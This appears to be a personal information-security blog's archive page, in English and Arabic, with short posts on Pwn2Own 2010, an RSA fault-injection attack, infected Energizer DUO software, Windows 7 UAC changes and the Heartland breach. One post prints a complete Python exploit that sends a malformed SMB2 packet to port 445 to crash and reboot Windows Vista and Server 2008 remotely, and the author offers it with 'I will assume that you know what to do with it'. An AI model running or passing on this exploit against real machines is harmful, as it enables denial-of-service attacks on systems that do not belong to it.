What I Know It’s About Experience

29Mar/10Off

Pwn2Own 2010 News

Pwn2Own is the brain child of Dragos Ruiu, the founder and director of the CanSecWest security conference.  This is an annual conference held every year in Vancouver, Canada (usually late March).  If you have never been to it I highly recommend the event. This is probably the most technically advanced conference world wide, even more so then events like Blackhat or Hack In The Box.  It tends to be smaller, about 200 people.  The Pwn2Own is an event where conference attendees are challenged to hack a fully patched device.  The first contest began in 2007 with just a Macbook laptop, but has grown to include items such as a Windows laptop and iPhone.  What makes this contest different then other hacking events is the caliber of contestants.  You literally have some of the best exploit developers in the world. They are motivated with a total of $100,000, but in addition gain tremendous bragging rights.  Many of the contestants said it took them 1-2 weeks to develop the exploits, in some cases two people worked together.  That averages 80-160 man hours to create an exploit. This year at the contest the following fully patched systems were successfully hacked.  
 
Firefox on 64-bit Windows 7
  Internet Explorer 8 on 64-bit Windows 7
  Safari on Mac OS X
  iPhone
So, what does that mean to us?  In general three things.
  1. Developing a new exploit takes a lot of work, however with enough time and talent anything can be hacked, even something fully patched.
  2. In general, most criminals are simply too lazy or do not have the skills to develop such advanced exploits.  But then again, they don't have to.  The simple, well known exploits and vulnerabilities are working just fine.
  3. The only organizations that would have to worry about such attacks are high-value targets. If you believe you are such a target, and that threats may target specifically you, contests like this demonstrate that no matter how much prevention you implement it can be bypassed. Detection and incident response are just as important as prevention. 
via HoneyTech Security Update
Tagged as: , , , , , No Comments
9Mar/10Off

1024-bit RSA encryption cracked!!

Since 1977, RSA public-key encryption has protected privacy and verified authenticity when using computers, gadgets and web browsers around the globe, with only the most brutish of brute force efforts (and 1,500 years of processing time) felling its 768-bit variety earlier this year. Now, three eggheads (or Wolverines, as it were) at the University of Michigan claim they can break it simply by tweaking a device's power supply. By fluctuating the voltage to the CPU such that it generated a single hardware error per clock cycle, they found that they could cause the server to flip single bits of the private key at a time, allowing them to slowly piece together the password. With a small cluster of 81 Pentium 4 chips and 104 hours of processing time, they were able to successfully hack 1024-bit encryption in OpenSSL on a SPARC-based system, without damaging the computer, leaving a single trace or ending human life as we know it. That's why they're presenting a paper at the Design, Automation and Test conference this week in Europe, and that's why -- until RSA hopefully fixes the flaw -- you should keep a close eye on your server room's power supply.

via: Engadget.com

Tagged as: , No Comments
9Mar/10Off

INFECTED HARDWARE !!

I received this interesting news today from my friend Lance. he said that he have read of several instances where hardware was infected but this is the first time he seen it officially reported in a CERT alert. The Energizer DUO, a USB-powered battery recharger was distributing malicious code that infected windows systems.

The hardware device itself does not infect the computer.  Instead the infection happens from the software that comes with the device.  Energizer is currently working with CERT to learn how their software was infected.  In addition, only 9 out of 42 anti-virus products were able to detect the virus.

Lesson learned, it does not matter where you get the software from, scan it before installing it.  Be sure your policies are enforcing this.

Technical details about this trojan can be found here

via: HoneyTech Security Update

Tagged as: , , , No Comments
17Sep/09Off

Charlie Miller: Snow Leopard is not as secure as Windows Vista/7

Snow Leopard lacks security features that are built in to Windows XP, Windows Vista and Windows 7, a noted Mac researcher has said. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus make it harder for them to craft reliable exploits.
"Apple didn't change anything," said Charlie Miller, of Baltimore-based Independent Security Evaluators, the co-author of The Mac Hacker's Handbook, and winner of two consecutive "Pwn2own" hacker contests. "It's the exact same ASLR as in Leopard, which means it's not very good."

Snow Leopard lacks security features that are built in to Windows XP, Windows Vista and Windows 7, a noted Mac researcher has said. Dubbed ASLR, for address space layout randomization, the technology randomly assigns data to memory to make it tougher for attackers to determine the location of critical operating system functions, and thus make it harder for them to craft reliable exploits.

"Apple didn't change anything," said Charlie Miller, of Baltimore-based Independent Security Evaluators, the co-author of The Mac Hacker's Handbook, and winner of two consecutive "Pwn2own" hacker contests. "It's the exact same ASLR as in Leopard, which means it's not very good."

Interesting news isn’t it :) you can continue reading @ the source here :)
Tagged as: , , , , No Comments
9Sep/09Off

Remote 0day Exploit for Vista, 2008 in the Wilde

There is a flaw in SMB2.0 which exists (I mean the SMBv2 itself not the vulnerability) in windows vista, 2008,7 and 2008 R2 but only Windows Vista & 2008 are vulnerable. If you exploited this flaw successfully you will crash & reboot any vista or 2008 remotely (of course only if SMB 445 port open :) ). Anyhow here is the exploit code it's written in python :) & I will assume that you know what to do with it :)

# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it
dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Tagged as: , , , 2 Comments
4Jul/09Off

HITBSecCont2009kl – Opened for Registration

Click Here to Register Now :)

in case you are wondering if i'm going or not, i don't think i'll go this year but i'll try :)

Tagged as: No Comments
27Jun/09Off

Software Protects You From ‘Shoulder Surfers’

Some guy has developed software that allows only an authorized person to see what is on the screen, everyone else just sees gibberish. Sounds interesting, I’d like to see it in action though.

Chameleon uses gaze-tracking software and camera equipment to track an authorized reader's eyes to show only that one person the correct text. After a 15-second calibration period where the software essentially "learns" the viewer's gaze patterns, anyone looking over that user's shoulder just sees dummy text that randomly and constantly changes.

source:hardocp

Tagged as: , No Comments
6Feb/09Off

2 changes to UAC in Windows 7 RC1

اكيد سمعتوا بالاخبار اللي تقول ان UAC بويندوز 7 ضعيف وماهو بمستوى ويندوز فيستا وانه بامكان  اي Malware  يرفع نفسه او يعطل خاصيه UAC دون اخذ الاذن من المستخدم نفسه وبدون مايدري .. انا سبق وان كتبت عن هالموضوع قبل كم يوم بالمدونة وانا ماشوفها ثغره لعده اسباب اولا انه بامكانك ترفع مستوى حمايه UAC وبهالشكل ينتهي الموضوع بالاظافه انه اذا تم تعطيل الـ UAC  راح تظهر لك نافذه تحت تفيدك بانه تم تعطيلها ومحتاج لاعاده تشغيل جهازك اظف الى هذا كله ان الـ Malware ماراح يدخل ويشتغل بجهازك الا والمستخدم نفسه له علاقه بالموضوع يعني مشغل شي عنده ماهو ثقه :) يعني الموضوع كله مايصير بشكل تلقائي  بدون تدخل المستخدم .. عشان كذا مايكروسوفت كانت تقاوم وتقول ان الموضوع لا هو ثغره ولا يحزنون وانه بناء على طلب المستخدمين خففنا مستوى UAC  بويندوز 7 بالاظافه الى انه احنا اعطينا المستخدم كامل التحكم وبامكانه رفع مستوى الحمايه الى اقصى درجه :) ...  بس مايكروسوفت بعد ماشافت ان الدعوه بتكبر ومابقى موقع ماتكلم  عن هالموضوع وبداءت المقالات السلبيه عن ويندوز 7 تظهر واللي راح تاثر سلبا على اراء الناس مثل ماصار على ايام فيستا .. قررت مايكروسوفت بتعديل UAC في النسخه المرشحه القادمه  من ويندوز 7 .. والتعديل هذا راح  يرفع البروسيس  الخاص بالتحكم  بـ UAC  الى مستوى High Integrity Level  يعني ماتقدر تعدل على UAC الا بعد ماترفع نفسك  لمستوى ادمن يعني راح يظهر لك المربع تكمل ولا تكنسل :) بالاظافه الى انه  بعد ماتعدل على مستوى UAC وتضغط على تطبيق  بيظهر لك  مربع يطلب منك التاكيد لتنفيذ التغيير :)   .

وبصراحه هاذي خطوه ايجابية  كبيره تحسب  لمايكروسوفت لانه سمعت لمستخدميها وعدلت  على  جزء اساسي من النظام بناء على طلب المستخدمين :) .

Tagged as: , , No Comments
1Feb/09Off

UAC security flaw in Windows 7 beta

 نزل خبر اليومين اللي راحت  بالاانترنت بعنوان  UAC Security Flaw in Windows 7 Beta  الخ الخ .. طبعا انا حالي حال اي شخص متابع ومهتم بالتقنيه شدني الخبر فا بديت اقرى  و حملت السكربت  بجهازي لتجربه الثغره كما  يقال عشان اشوف هل فعلا بيعطل ال UAC والمستخدم نايم في العسل مايدري ولا كيف ؟؟ المهم بعد ماحملت السكربت وشغلت فعلا قام بتعطيل الـ UAC بدون اذني بس  الـ Action Center بويندوز 7  وبنفس للحظه طلع لي تحذير بانه تم تعطيل الـ UAC وانه لازم اعيد التشغيل  الجهاز لاكمال عملية تعطيل الـ UAC طبعا تجاهلت الرساله وبديت اتحرك بالنظام بحريه وبدون ماتطلع لي اي رساله UAC !!

طبعا في  لحظه فكرت انه فعلا عيب ولازم مايكروسوفت تصلحه بس بعد التدقيق اكتشفت انها لا عيب ولا ثغره ولا يحزنون اصلا الناس كانت تشتكي من UAC بفيستا وكانت تطالب مايكروسوفت بانها تعطي المستخدم حريه اختيار مستوى الحماية اللي هو يبغاه .. وفعلا هذا اللي صار بويندوز 7 الـ UAC موجوده بس المستخدم له حريه  الخيار  والتحكم بمستوى حمايه الـ UAC للنظام  والاعدادات الافتراضيه للـ UAC وسط بويندوز 7 يعني ماينط لك  بشكل متكرر مثل الفيستا .  فا سبحان الله ارضاء الناس فعلا غايه لا تدرك .. ايام ماكان UAC بشكل افتراضي على  اقصى مستوى حماية كانت الناس تبحث وتسال كيف يتم تعطيله لانه مزعج ؟  والان لما ترك لهم الخيار واصبح بشكل افتراضي غير مزعج  قالوا لاء هاذي ثغره وبتخلي النظام مفتوح بدون حمايه ؟؟  مع العلم انا اشوف ان الخبر معطى اكبر من حجمه لانه اولا عشان يتم تشغيل السكربت او البرنامج اللي بيعطل ال UAC لازم يكون المستخدم مسوي شي بنفسه يعني ضاغط على برنامج مايعرفه منزل سكربت بجهازه ومشغله وهكذاا .. بالاظافه الى انه في حالة تعطيل خاصيه UAC راح تظهر لك رساله  كبيره تقريبا حجمها نص التاسك بار يعني مافيه امل تقول ماشفتها مفادها ان الـ UAC تم تعطيلها ولابد لك من اعاده التشغيل .. فابالتالي المفروض المستخدم اول مايشوف هالرساله يعرف ان الموضوع فيه شي مو مضبوط .. واخيرا وليس اخراا .. بامكانك رفع مستوى UAC الى اقصى شي وبالتالي راح يكون عندك مستوى حمايه عالي ولا برنامج ولا سكربت بامكانه تعطيل او تعديل على اي  اعداد بنظامك بدون  ماتسمح له وتضغط على متابعه. ( وهذا انا اللي مسويه بجهازي لاني ماستخدم انتي فايروس).

Tagged as: , , , No Comments
21Jan/09Off

Biggest data breach in history

شركه  heartland payment systems  تم اختراقها  وسرقه 100 مليون بطاقة ائتمانيه :) طبعا الهاكرز اللي مخططين للموضوع شكلهم مخمخين على الموضوع وانتظروا لحد اليوم المهم وهو يوم تنصيب الرئيس الجديد لامريكا وطبعا الناس اغلبهم  مشغولهين بمتابعه الحدث بس مو هنا الزبده. المشكله انهم ماعرفوا بالموضوع الا من شركه فيزا وماستر كارد اللي كلمتهم وقالت ان فيه عمليات جالسه تصير مشبهه فيها انها غير طبيعيه  وفعلا بعد التحقيق بالموضوع وجدوا ادله  تاكد بان النظام تم اختراقه  فانجنوا كيف تم الاختراق؟؟ طبعا مازالت التحقيقات مستمره والموضوع داخله فيه  الـ FBI وبحكم ان الاختراق يعد الاكبر في التاريخ  فتحوا موقع  اسمه  www.2008breach.com  من خلاله  تم الاعلان وتحذير العملاء  وحثهم على تشيك  سجلاتهم الخاصه  وعند ملاحظه اي عمليه مشبوهه عليهم الاتصال فورا والابلاغ  عنها. طبعا قدروا يحددون اي السجلات والمعلومات اللي قدروا يحصلون عليها بالضبط. وهذا يرجع لوجود انظمه مراقبه داخليه على الانظمه. 

انظمه المراقبه مثل IDS و IPS و  تفعيل الـ Auditing Logs مهمه جداا باي بيئه عمل مو شرط انها تحميك من الهاكرز بشكل كامل ولا فيه اصلا شي كامل .. بس على الاقل راح يكون بامكانك السيطره على الموقف ومعرفه اللي صار بالضبط وبالتالي تكون عندك فرصه كبيره  لمطارده الهاكر والقبض عليه. طبعا عشان بيئه العمل تستفيد من هالتقنيات بالشكل المطلوب لازم توظف ناس متمكنه بهالمجال وتعرف تراقب وعندها خلفيه عن التحركات المشبوهه والغير عاديه لكن اذا الانظمه موجوده بس الناس  اللي موظفهم غير مؤهلين فا ماراح تقدر تستفيد بشكل كامل  وبعض الاحيان ممكن يكون فات الاوان واخترقت انظمتك وموظفينك يتفرجون لان ماعندهم القدره على التمييز :) .

Tagged as: 3 Comments
   Older Entries »

Calendar

September 2010
S S M T W T F
« Aug    
 123
45678910
11121314151617
18192021222324
252627282930  

RSS Free Softwares

Tag Cloud

Announcement Antivirus Apple auditors benchmark Beta1 Browser Business Risk Information Security Debug documentation Editions Education Certification Knowledge Experience Federated Search Forensic Hacked Hardware HITB 2008 I'M A PC Internet Broken Live MacBook Micorosft Microsoft Microsoft ads Microsoft ICE nVidia Defective Oracle PDC 2008 Projects Recorder Security Security Awareness Security Talk Snow Leopard Sun SuperFetch UAC USB 3.0 video Wave3 Windows Windows7 Windows 2008 R2 Windows Vista WP-RTL

Posts Archives

Friends